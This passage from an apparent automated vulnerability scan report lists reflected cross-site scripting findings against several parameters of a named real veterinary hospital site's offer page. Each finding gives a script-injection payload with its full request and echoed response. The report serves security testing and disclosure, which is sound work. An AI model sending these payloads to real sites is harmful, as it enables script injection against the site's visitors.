%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:56 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kobmgoan4hgeoq1ek4db6fi2v5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=04cd11"><script>alert(1)</script>bb1f3698051 &optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f...[SNIP]...
2.33. http://www.vcahospitals.com/main/offer [optin parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8827"><script>alert(1)</script>059c58f8099 was submitted in the optin parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099 &guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14533 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1f8827"><script>alert(1)</script>059c58f8099 &guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.34. http://www.vcahospitals.com/main/offer [other parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the other request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d5e"><script>alert(1)</script>d09f3450d0b was submitted in the other parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b &petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:31 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=6n7l65heh918gmaumh17hnsri4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... /www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=55d5e"><script>alert(1)</script>d09f3450d0b &petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city...[SNIP]...
2.35. http://www.vcahospitals.com/main/offer [petage parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the petage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48342"><script>alert(1)</script>799b196a043 was submitted in the petage parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043 &petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:39 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=s9111l9njt4haqvhbc32et8al6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043 &petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26da...[SNIP]...
2.36. http://www.vcahospitals.com/main/offer [petname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9d9"><script>alert(1)</script>32ff1a8fde2 was submitted in the petname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2 &pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:45 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=tltmjp59dlja7q81sha6gm0bu4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... .com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2 &pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307...[SNIP]...
2.37. http://www.vcahospitals.com/main/offer [pettype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ff0"><script>alert(1)</script>c819c2cd266 was submitted in the pettype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266 &phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:17:51 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=21dh1lcji1465f3ng24l2mb1q3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... /offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266 &phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26...[SNIP]...
2.38. http://www.vcahospitals.com/main/offer [phone parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141be"><script>alert(1)</script>908e5de26cc was submitted in the phone parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
